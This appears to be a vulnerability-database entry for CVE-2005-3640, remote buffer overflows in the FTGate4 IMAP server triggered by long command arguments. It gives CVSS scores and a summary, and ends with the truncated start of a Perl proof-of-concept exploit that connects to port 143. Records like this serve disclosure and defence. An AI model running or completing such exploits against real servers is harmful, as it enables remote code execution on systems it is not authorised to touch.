10
CVSSv2

CVE-2005-3640

Published: 16/11/2005 Updated: 11/07/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple buffer overflows in the IMAP Groupware Mail server of Floosietek FTGate (FTGate4) 4.1 allow remote malicious users to execute arbitrary code via long arguments to various IMAP commands, as demonstrated with the EXAMINE command.

Exploits

#!/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoliit\n"; print "wwwlucaercoliit\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "143", ); unless ($remote) { die "Can't connect to $host" } print "[!] Connected\n"; pr ...